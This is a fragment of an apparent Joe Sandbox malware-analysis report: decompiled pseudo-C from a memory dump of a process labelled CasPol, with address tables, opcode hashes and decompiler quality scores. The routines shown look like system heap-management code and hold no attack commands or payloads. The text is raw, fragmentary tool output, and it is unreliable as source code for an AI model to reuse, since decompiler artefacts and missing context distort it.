                                                                							}
                                                                							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                								goto L34;
                                                                							}
                                                                							_t113 = _v1056;
                                                                							_v1060 = _t118;
                                                                							__eflags = _t113;
                                                                							if(_t113 == 0) {
                                                                								goto L10;
                                                                							}
                                                                							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                							goto L11;
                                                                						}
                                                                						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                						__eflags = _t118 - _a20;
                                                                						if(_t118 <= _a20) {
                                                                							_t114 =  *(_t102 + 4);
                                                                							_t77 = _t118;
                                                                							goto L26;
                                                                						}
                                                                						_v1060 = _t118;
                                                                						goto L10;
                                                                					}
                                                                					__eflags = _t122 - 0x80000005;
                                                                					if(_t122 != 0x80000005) {
                                                                						goto L15;
                                                                					}
                                                                					L016477F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                					L18:
                                                                					_t121 = _v1060;
                                                                					goto L19;
                                                                				}
                                                                				_push( &_v1060);
                                                                				_push(0x400);
                                                                				_t102 =  &_v1036;
                                                                				_push(_t102);
                                                                				_push(2);
                                                                				_push( &_v1048);
                                                                				_push(_t116);
                                                                				_t122 = E01669650();
                                                                				if(_t122 >= 0) {
                                                                					__eflags = 0;
                                                                					_v1052 = 0;
                                                                					goto L7;
                                                                				}
                                                                				if(_t122 == 0x80000005) {
                                                                					goto L18;
                                                                				}
                                                                				goto L4;
                                                                			}










































                                                                0x01697b96
                                                                0x01697b98
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b9e
                                                                0x01697b9f
                                                                0x01697ba3
                                                                0x00000000
                                                                0x01697ba3
                                                                0x01697b66
                                                                0x01697b68
                                                                0x01697ae2
                                                                0x01697ae2
                                                                0x00000000
                                                                0x01697ae2
                                                                0x01697b6e
                                                                0x01697b72
                                                                0x01697b75
                                                                0x01697b81
                                                                0x01697b85
                                                                0x01697b87
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b31
                                                                0x01697b34
                                                                0x01697b3c
                                                                0x01697b45
                                                                0x01697b46
                                                                0x01697b4f
                                                                0x01697b51
                                                                0x01697b57
                                                                0x01697b59
                                                                0x01697b59
                                                                0x00000000
                                                                0x01697b59
                                                                0x01697b77
                                                                0x00000000
                                                                0x01697b77
                                                                0x01697b2a
                                                                0x00000000
                                                                0x01697b2a
                                                                0x01697af1
                                                                0x01697af3
                                                                0x00000000
                                                                0x00000000
                                                                0x01697afb
                                                                0x01697afc
                                                                0x01697afe
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b00
                                                                0x01697b03
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b05
                                                                0x01697b09
                                                                0x01697b0d
                                                                0x01697b0f
                                                                0x00000000
                                                                0x00000000
                                                                0x01697b18
                                                                0x01697b1d
                                                                0x00000000
                                                                0x01697b1d
                                                                0x01697ab7
                                                                0x01697ab9
                                                                0x00000000
                                                                0x00000000
                                                                0x01697abf
                                                                0x01697ac1
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ac3
                                                                0x01697ac6
                                                                0x00000000
                                                                0x00000000
                                                                0x01697ac8
                                                                0x01697acc
                                                                0x01697ad0
                                                                0x01697ad2
                                                                0x00000000
                                                                0x00000000
                                                                0x01697adb
                                                                0x00000000
                                                                0x01697adb
                                                                0x016979d6
                                                                0x016979d9
                                                                0x016979dc
                                                                0x01697a91
                                                                0x01697a94
                                                                0x00000000
                                                                0x01697a94
                                                                0x016979e2
                                                                0x00000000
                                                                0x016979e2
                                                                0x01697a74
                                                                0x01697a7a
                                                                0x00000000
                                                                0x00000000
                                                                0x01697a8a
                                                                0x01697a21
                                                                0x01697a21
                                                                0x00000000
                                                                0x01697a21
                                                                0x0162c650
                                                                0x0162c651
                                                                0x0162c656
                                                                0x0162c65c
                                                                0x0162c65d
                                                                0x0162c663
                                                                0x0162c664
                                                                0x0162c66a
                                                                0x0162c66e
                                                                0x016979c5
                                                                0x016979c7
                                                                0x00000000
                                                                0x016979c7
                                                                0x0162c67a
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                                                                • Instruction ID: aea53e7b683cbcfab525b1baa9e05b9e30bbd0a111c8c10ad0b602dc80fa92f4
                                                                • Opcode Fuzzy Hash: 8d6957365b1633d69853dcbb277fe582d94fb654e22ca3e0fd43f516f5018125
                                                                • Instruction Fuzzy Hash: 88819D756242068BDF26CE58CC80A7AB7ADFF84250F14496EEE459B345D334ED41CFA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 73%
                                                                			E016E03DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				intOrPtr* _v16;
                                                                				signed int* _v20;
                                                                				signed int _v24;
                                                                				signed char _v28;
                                                                				signed int _v32;
                                                                				signed int* _v36;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				intOrPtr* _t80;
                                                                				signed int _t87;
                                                                				signed char _t90;
                                                                				signed int _t107;
                                                                				intOrPtr* _t119;
                                                                				signed int _t120;
                                                                				signed int _t121;
                                                                				signed char _t127;
                                                                				void* _t129;
                                                                				intOrPtr* _t130;
                                                                				signed int _t137;
                                                                				signed int _t139;
                                                                				signed int _t141;
                                                                				signed int _t144;
                                                                				signed char _t148;
                                                                				signed int _t154;
                                                                				signed char _t155;
                                                                				signed int _t164;
                                                                				unsigned int _t167;
                                                                				signed int _t168;
                                                                				signed int _t170;
                                                                				unsigned int _t173;
                                                                				signed int* _t174;
                                                                				signed int _t175;
                                                                				intOrPtr* _t177;
                                                                				signed int _t178;
                                                                				signed int _t179;
                                                                				signed int _t180;
                                                                				signed char _t183;
                                                                				intOrPtr _t184;
                                                                				unsigned int _t186;
                                                                				unsigned int _t187;
                                                                
                                                                				_push( *0x171634c);
                                                                				_t119 = __ecx;
                                                                				_t184 = __edx;
                                                                				_push( *0x1716348);
                                                                				_v20 = __ecx;
                                                                				_push(0);
                                                                				_t129 = 0xc;
                                                                				_t80 = E016EBBBB(_t129, _t129);
                                                                				_t130 = _t80;
                                                                				_v16 = _t130;
                                                                				if(_t130 == 0) {
                                                                					return _t80;
                                                                				}
                                                                				 *((intOrPtr*)(_t130 + 8)) = _a4;
                                                                				_t82 =  &(__ecx[1]);
                                                                				 *((intOrPtr*)(_t130 + 4)) = _t184;
                                                                				_v36 =  &(__ecx[1]);
                                                                				E01642280( &(__ecx[1]), _t82);
                                                                				_v12 = 1;
                                                                				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                				_t120 = _t119 + 8;
                                                                				_t175 =  *(_t120 + 4);
                                                                				_t87 = _t175 >> 5;
                                                                				if( *_t120 < _t87 + _t87) {
                                                                					L22:
                                                                					_t186 = _t175 >> 5;
                                                                					_t177 = _v16;
                                                                					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
                                                                					_v8 = _t90;
                                                                					_t137 =  *(_t120 + 8);
                                                                					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
                                                                					_t67 = _t186 - 1; // 0xffffffdf
                                                                					_t164 = _t67 & _v8;
                                                                					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
                                                                					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
                                                                					 *_t120 =  *_t120 + 1;
                                                                					_t178 = 0;
                                                                					L23:
                                                                					 *_v20 =  *_v20 & 0x00000000;
                                                                					E0163FFB0(_t120, _t178, _v36);
                                                                					if(_t178 != 0) {
                                                                						E016EBCD2(_t178,  *0x1716348,  *0x171634c);
                                                                					}
                                                                					return _v12;
                                                                				}
                                                                				_t139 = 2;
                                                                				_t87 = E0165F3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
                                                                				if(_t87 < 0) {
                                                                					goto L22;
                                                                				}
                                                                				_t187 = _v8;
                                                                				if(_t187 < 4) {
                                                                					_t187 = 4;
                                                                				}
                                                                				_push(0);
                                                                				_t87 = E016E0150(_t187 << 2);
                                                                				_t179 = _t87;
                                                                				_v8 = _t179;
                                                                				if(_t179 == 0) {
                                                                					_t175 =  *(_t120 + 4);
                                                                					if(_t175 >= 0x20) {
                                                                						goto L22;
                                                                					}
                                                                					_v12 = _v12 & 0x00000000;
                                                                					_t178 = _v16;
                                                                					goto L23;
                                                                				} else {
                                                                					_t19 = _t187 - 1; // 0x3
                                                                					_t141 = _t19;
                                                                					if((_t187 & _t141) == 0) {
                                                                						L10:
                                                                						if(_t187 > 0x4000000) {
                                                                							_t187 = 0x4000000;
                                                                						}
                                                                						_v28 = _v28 & 0x00000000;
                                                                						_t167 = _t187 << 2;
                                                                						_t107 = _t120 | 0x00000001;
                                                                						_v24 = _t179;
                                                                						_t168 = _t167 >> 2;
                                                                						asm("sbb ecx, ecx");
                                                                						_t144 =  !(_t167 + _t179) & _t168;
                                                                						if(_t144 <= 0) {
                                                                							L15:
                                                                							_t180 = 0;
                                                                							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
                                                                							_v24 = _t170;
                                                                							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
                                                                								L20:
                                                                								_t147 =  *(_t120 + 8);
                                                                								_t87 = _v8;
                                                                								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
                                                                								 *(_t120 + 8) = _t87;
                                                                								 *(_t120 + 4) = _t175;
                                                                								if( *(_t120 + 8) != 0) {
                                                                									_push(0);
                                                                									_t87 = E016E0180(_t147);
                                                                									_t175 =  *(_t120 + 4);
                                                                								}
                                                                								goto L22;
                                                                							} else {
                                                                								goto L16;
                                                                							}
                                                                							do {
                                                                								L16:
                                                                								_t121 =  *(_t120 + 8);
                                                                								_v32 = _t121;
                                                                								while(1) {
                                                                									_t148 =  *(_t121 + _t180 * 4);
                                                                									_v28 = _t148;
                                                                									if((_t148 & 0x00000001) != 0) {
                                                                										goto L19;
                                                                									}
                                                                									 *(_t121 + _t180 * 4) =  *_t148;
                                                                									_t124 =  *(_t148 + 4) & _t170;
                                                                									_t173 = _v8;
                                                                									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                                                                									_t127 = _v28;
                                                                									 *_t127 =  *(_t173 + _t154 * 4);
                                                                									 *(_t173 + _t154 * 4) = _t127;
                                                                									_t170 = _v24;
                                                                									_t121 = _v32;
                                                                								}
                                                                								L19:
                                                                								_t180 = _t180 + 1;
                                                                								_t120 =  &(_v20[2]);
                                                                							} while (_t180 <  *(_t120 + 4) >> 5);
                                                                							goto L20;
                                                                						} else {
                                                                							_t174 = _t179;
                                                                							_t183 = _v28;
                                                                							do {
                                                                								_t183 = _t183 + 1;
                                                                								 *_t174 = _t107;
                                                                								_t174 =  &(_t174[1]);
                                                                							} while (_t183 < _t144);
                                                                							goto L15;
                                                                						}
                                                                					}
                                                                					_t155 = _t141 | 0xffffffff;
                                                                					if(_t187 == 0) {
                                                                						L9:
                                                                						_t187 = 1 << _t155;
                                                                						goto L10;
                                                                					} else {
                                                                						goto L8;
                                                                					}
                                                                					do {
                                                                						L8:
                                                                						_t155 = _t155 + 1;
                                                                						_t187 = _t187 >> 1;
                                                                					} while (_t187 != 0);
                                                                					goto L9;
                                                                				}
                                                                			}


                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 204dc679f701f5f5fdc76928913893391b3e7a1587c8220f08b3998e6e44fb22
                                                                • Instruction ID: 817afd06365e71a6a6f5705304eb99275ad49fe749e35266eda4d549ba703834
                                                                • Opcode Fuzzy Hash: 204dc679f701f5f5fdc76928913893391b3e7a1587c8220f08b3998e6e44fb22
                                                                • Instruction Fuzzy Hash: 4D71B272A01215DBDB18CF5CCD80B6DBBF6EB84310F298269E9159F385D770E941CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 60%
                                                                			E016ED616(signed int __ecx, intOrPtr __edx, signed int _a4) {
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed char _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				unsigned int _v36;
                                                                				intOrPtr _v40;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				signed int _t79;
                                                                				signed char _t86;
                                                                				signed int _t88;
                                                                				void* _t91;
                                                                				signed int _t94;
                                                                				signed int _t95;
                                                                				unsigned int _t96;
                                                                				signed int _t110;
                                                                				signed char _t118;
                                                                				intOrPtr _t120;
                                                                				signed int _t123;
                                                                				signed int _t124;
                                                                				signed char _t131;
                                                                				signed int _t133;
                                                                				signed int _t137;
                                                                				signed char _t147;
                                                                				signed int _t153;
                                                                				signed int _t159;
                                                                				signed int _t160;
                                                                				signed int _t161;
                                                                				signed int _t164;
                                                                				signed int _t169;
                                                                				signed int _t173;
                                                                
                                                                				_v8 =  *0x171d360 ^ _t173;
                                                                				_t120 = __edx;
                                                                				_t159 = __ecx;
                                                                				_v40 = __edx;
                                                                				_t150 =  *(__edx + 1) & 0x000000ff;
                                                                				_t174 =  *0x171610c & 0x00000001;
                                                                				_t160 = 0;
                                                                				_v24 = 0;
                                                                				_v28 =  *(0x160aef0 + ( *(__edx + 1) & 0x000000ff) * 2) & 0x0000ffff;
                                                                				if(( *0x171610c & 0x00000001) == 0) {
                                                                					_v12 = 0;
                                                                				} else {
                                                                					_v12 = E016EC70A(__ecx + 0x38, _t150);
                                                                				}
                                                                				_t79 = E016EC5FF(_t120, 0, _t174);
                                                                				_t153 = _t79 * _v28;
                                                                				_v36 = _t153;
                                                                				_v32 = (0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2;
                                                                				_t86 = E016EA359((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + ((0x00000027 + (0x0000001f + _t79 * 0x00000002 >> 0x00000005) * 0x00000004 & 0xfffffff8) + 0xfff + _t153 >> 0xc) * 2 + _t153,  *((intOrPtr*)(_t159 + 0x2c)));
                                                                				_t131 = _t86;
                                                                				_v16 = _t86;
                                                                				if(_t131 <= 0xc) {
                                                                					_t131 = 0xc;
                                                                					_v16 = _t131;
                                                                				}
                                                                				_t123 = 1 << _t131;
                                                                				_v20 = 1;
                                                                				if(( *0x171610c & 0x00000008) == 0) {
                                                                					L11:
                                                                					_t88 = 1;
                                                                					__eflags = 1;
                                                                					L12:
                                                                					_t133 = _a4 & _t88;
                                                                					_v32 = _t133;
                                                                					if(_t133 == 0) {
                                                                						L0164FAD0(_t159 + 0x34);
                                                                					}
                                                                					_t134 = _t159 + (_v16 + 0xfffffffc) * 8;
                                                                					_t91 = 0;
                                                                					if( *((intOrPtr*)(_t159 + (_v16 + 0xfffffffc) * 8 + 4)) == 0) {
                                                                						_t124 = 0;
                                                                					} else {
                                                                						_t124 = E01651710(_t134);
                                                                						_t91 = 0;
                                                                					}
                                                                					if(_t124 != 0) {
                                                                						_t94 = 1 <<  *(_t124 + 0x1c);
                                                                						__eflags = 1;
                                                                						goto L22;
                                                                					} else {
                                                                						 *0x171b1e0( *_t159, _v20, _t91, _a4);
                                                                						_t124 =  *( *(_t159 + 4) ^  *0x1716110 ^ _t159)();
                                                                						if(_t124 != 0) {
                                                                							_t94 = 0;
                                                                							_t160 = 0;
                                                                							L22:
                                                                							__eflags =  *0x171610c & 0x00000002;
                                                                							_v16 = _t94;
                                                                							if(( *0x171610c & 0x00000002) == 0) {
                                                                								L25:
                                                                								_t95 = E016ED597(_v20, _v28);
                                                                								_t156 = _t95;
                                                                								_v12 = _t95;
                                                                								L26:
                                                                								_t96 = _v16;
                                                                								__eflags = _t96;
                                                                								if(_t96 != 0) {
                                                                									__eflags =  *((char*)(_t124 + 0x1d)) - 1;
                                                                									if( *((char*)(_t124 + 0x1d)) > 1) {
                                                                										_t169 = _t96 >> 0xc;
                                                                										__eflags = _t169;
                                                                										_t160 =  ~_t169;
                                                                										_v24 = _t160;
                                                                									}
                                                                								}
                                                                								__eflags = _t96 - _t156;
                                                                								if(_t96 >= _t156) {
                                                                									L33:
                                                                									_t137 = _v20;
                                                                									__eflags = _t156 - _t137;
                                                                									if(_t156 != _t137) {
                                                                										_t160 = _t160 + (_t156 >> 0xc);
                                                                										__eflags = _t160;
                                                                									}
                                                                									__eflags = _t160;
                                                                									if(_t160 != 0) {
                                                                										asm("lock xadd [eax], esi");
                                                                									}
                                                                									_push(_t137);
                                                                									_t156 = _t137;
                                                                									E016EDEF6(_t124, _t137, _t137, _v28);
                                                                									asm("lock inc dword [eax+0x20]");
                                                                									asm("lock xadd [eax], ecx");
                                                                									_t161 = _t124;
                                                                									_t124 = 0;
                                                                									__eflags = 0;
                                                                									goto L38;
                                                                								} else {
                                                                									 *0x171b1e0( *_t159, _t124, _t156);
                                                                									_t110 =  *( *(_t159 + 0xc) ^  *0x1716110 ^ _t159)();
                                                                									__eflags = _t110;
                                                                									if(_t110 >= 0) {
                                                                										_t160 = _v24;
                                                                										_t156 = _v12;
                                                                										goto L33;
                                                                									}
                                                                									_t161 = 0;
                                                                									L38:
                                                                									_v12 = _t161;
                                                                									__eflags = _t124;
                                                                									if(_t124 != 0) {
                                                                										_t164 =  *(_t159 + 8) ^  *0x1716110 ^ _t159;
                                                                										__eflags = _t164;
                                                                										 *0x171b1e0( *_t159, _t124, _v20, _a4);
                                                                										 *_t164();
                                                                										_t161 = _v12;
                                                                									}
                                                                									L40:
                                                                									if(_v32 == 0) {
                                                                										E0164FA00(_t124, _t159 + 0x34, _t159, _t159 + 0x34);
                                                                									}
                                                                									return E0166B640(_t161, _t124, _v8 ^ _t173, _t156, _t159, _t161);
                                                                								}
                                                                							}
                                                                							__eflags = _v12;
                                                                							if(_v12 == 0) {
                                                                								goto L25;
                                                                							}
                                                                							_t156 = _v20;
                                                                							_v12 = _t156;
                                                                							goto L26;
                                                                						}
                                                                						_t161 = 0;
                                                                						goto L40;
                                                                					}
                                                                				}
                                                                				_t146 = _v36;
                                                                				if(_v32 > _v36 >> 6) {
                                                                					goto L11;
                                                                				}
                                                                				_t118 = E016EA359(_t146,  *((intOrPtr*)(_t159 + 0x2c)));
                                                                				_t147 = _t118;
                                                                				_v16 = _t118;
                                                                				if(_t147 <= 0xc) {
                                                                					_t147 = 0xc;
                                                                					_v16 = _t147;
                                                                				}
                                                                				_t88 = 1;
                                                                				_t156 = 1 << _t147;
                                                                				if(_t123 > 1) {
                                                                					_v20 = 1;
                                                                				}
                                                                				goto L12;
                                                                			}






































                                                                0x016ed7a5
                                                                0x016ed7a8
                                                                0x016ed7aa
                                                                0x016ed7aa
                                                                0x016ed7a1
                                                                0x016ed7ad
                                                                0x016ed7af
                                                                0x016ed7d8
                                                                0x016ed7d8
                                                                0x016ed7db
                                                                0x016ed7dd
                                                                0x016ed7e4
                                                                0x016ed7e4
                                                                0x016ed7e4
                                                                0x016ed7e6
                                                                0x016ed7e8
                                                                0x016ed7f0
                                                                0x016ed7f0
                                                                0x016ed7f4
                                                                0x016ed7f9
                                                                0x016ed7fd
                                                                0x016ed805
                                                                0x016ed810
                                                                0x016ed814
                                                                0x016ed816
                                                                0x016ed816
                                                                0x00000000
                                                                0x016ed7b1
                                                                0x016ed7c2
                                                                0x016ed7c8
                                                                0x016ed7ca
                                                                0x016ed7cc
                                                                0x016ed7d2
                                                                0x016ed7d5
                                                                0x00000000
                                                                0x016ed7d5
                                                                0x016ed7ce
                                                                0x016ed818
                                                                0x016ed818
                                                                0x016ed81b
                                                                0x016ed81d
                                                                0x016ed831
                                                                0x016ed831
                                                                0x016ed835
                                                                0x016ed83b
                                                                0x016ed83d
                                                                0x016ed83d
                                                                0x016ed840
                                                                0x016ed844
                                                                0x016ed84a
                                                                0x016ed84a
                                                                0x016ed861
                                                                0x016ed861
                                                                0x016ed7af
                                                                0x016ed778
                                                                0x016ed77c
                                                                0x00000000
                                                                0x00000000
                                                                0x016ed77e
                                                                0x016ed781
                                                                0x00000000
                                                                0x016ed781
                                                                0x016ed757
                                                                0x00000000
                                                                0x016ed757
                                                                0x016ed731
                                                                0x016ed6c6
                                                                0x016ed6d1
                                                                0x00000000
                                                                0x00000000
                                                                0x016ed6d6
                                                                0x016ed6db
                                                                0x016ed6dd
                                                                0x016ed6e3
                                                                0x016ed6e7
                                                                0x016ed6e8
                                                                0x016ed6e8
                                                                0x016ed6ed
                                                                0x016ed6f0
                                                                0x016ed6f4
                                                                0x016ed6f6
                                                                0x016ed6f6
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d094a5bdb694a3f754ce8dcb20290e2f4fbf695e19bad5402486aac71f549d2
                                                                • Instruction ID: 123d08c98f59bae8382ef941d6c1cdac5909b9ac3ae9650440d3fe9070a158ca
                                                                • Opcode Fuzzy Hash: 7d094a5bdb694a3f754ce8dcb20290e2f4fbf695e19bad5402486aac71f549d2
                                                                • Instruction Fuzzy Hash: 83818C71E0126A9BCF14DFA8DC846BEBBF5BF48210F158269E915E7381EB709911CF84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 25%
                                                                			E016DFA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				void* _t98;
                                                                				signed char _t106;
                                                                				intOrPtr _t107;
                                                                				signed char _t114;
                                                                				signed short _t116;
                                                                				signed short _t117;
                                                                				signed short _t121;
                                                                				signed short _t123;
                                                                				signed int* _t127;
                                                                				signed int _t128;
                                                                				signed int _t130;
                                                                				signed short _t134;
                                                                				void* _t135;
                                                                				signed int* _t136;
                                                                				void* _t138;
                                                                				signed int _t148;
                                                                				signed int _t154;
                                                                				signed int _t156;
                                                                				signed int _t157;
                                                                				intOrPtr _t163;
                                                                				intOrPtr _t168;
                                                                				void* _t169;
                                                                				intOrPtr _t171;
                                                                
                                                                				_t157 = __edx;
                                                                				_push(0x2c);
                                                                				_push(0x1700e38);
                                                                				_t98 = E0167D08C(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
                                                                				_t168 = __ecx;
                                                                				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
                                                                				 *((intOrPtr*)(_t169 - 0x20)) = 0;
                                                                				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
                                                                				_t171 =  *0x1717bc8; // 0x0
                                                                				if(_t171 == 0) {
                                                                					 *((intOrPtr*)(_t169 - 4)) = 0;
                                                                					_t148 =  *__edx;
                                                                					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
                                                                					 *(_t169 - 0x28) = _t148 >> 0x18;
                                                                					 *(_t169 - 0x24) = _t148 >> 8;
                                                                					_t106 = _t148 >> 0x10;
                                                                					if(( *(__ecx + 0x4c) & _t148) == 0) {
                                                                						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
                                                                						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
                                                                							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
                                                                							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
                                                                							_t114 =  *((intOrPtr*)(_t157 + 6));
                                                                							if(_t114 == 0) {
                                                                								_t163 = _t168;
                                                                							} else {
                                                                								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
                                                                							}
                                                                							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
                                                                							_t116 = _t148 & 0x0000ffff;
                                                                							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
                                                                								_t148 =  *((intOrPtr*)(_t157 + 7));
                                                                								if(_t148 == 4) {
                                                                									L12:
                                                                									_t117 = _t116 & 0x0000ffff;
                                                                									 *(_t169 - 0x2c) = _t117;
                                                                									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
                                                                									if(_t148 != 3) {
                                                                										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
                                                                										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
                                                                										 *(_t169 - 0x24) = _t148;
                                                                										_push(0);
                                                                										_pop(0);
                                                                										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
                                                                											_t121 = _t148;
                                                                											goto L23;
                                                                										}
                                                                									} else {
                                                                										_t30 = _t157 + 8; // 0x8
                                                                										_t148 = _t30;
                                                                										_t130 =  *(_t148 + 0x10);
                                                                										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
                                                                											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
                                                                											_t148 =  *_t148;
                                                                											_t134 =  *( *(_t157 + 0xc));
                                                                											 *(_t169 - 0x2c) = _t134;
                                                                											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
                                                                												_t42 = _t157 + 8; // 0x8
                                                                												_t135 = _t42;
                                                                												if( *(_t169 - 0x2c) == _t135) {
                                                                													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
                                                                													_t136 = _t135 + 8;
                                                                													 *(_t169 - 0x2c) = _t136;
                                                                													_t148 =  *_t136;
                                                                													_t138 =  *(_t136[1]);
                                                                													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
                                                                														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
                                                                														 *(_t169 - 0x24) = _t121;
                                                                														L23:
                                                                														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
                                                                														_t148 =  *(_t157 + 4) & 0x0000ffff;
                                                                														if(_t121 == _t148) {
                                                                															L31:
                                                                															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
                                                                															if(( *(_t157 + 2) & 0x00000001) != 0) {
                                                                																L34:
                                                                																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
                                                                															} else {
                                                                																_t148 =  *(_t157 + 8);
                                                                																_t123 =  *( *(_t157 + 0xc));
                                                                																 *(_t169 - 0x2c) = _t123;
                                                                																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
                                                                																	goto L34;
                                                                																}
                                                                															}
                                                                														} else {
                                                                															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
                                                                															if( *(_t168 + 0x4c) == 0) {
                                                                																_t128 =  *_t127;
                                                                																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
                                                                															} else {
                                                                																_t156 =  *_t127;
                                                                																 *(_t169 - 0x30) = _t156;
                                                                																if(( *(_t168 + 0x4c) & _t156) == 0) {
                                                                																	_t128 = _t156;
                                                                																} else {
                                                                																	_t128 =  *(_t168 + 0x50) ^ _t156;
                                                                																	 *(_t169 - 0x30) = _t128;
                                                                																}
                                                                																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
                                                                															}
                                                                															 *(_t169 - 0x24) = _t154;
                                                                															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
                                                                															if(_t128 == _t148) {
                                                                																goto L31;
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                										}
                                                                									}
                                                                								} else {
                                                                									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
                                                                									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
                                                                										goto L12;
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
                                                                					if( *(_t168 + 0x4c) != 0) {
                                                                						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
                                                                						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
                                                                					}
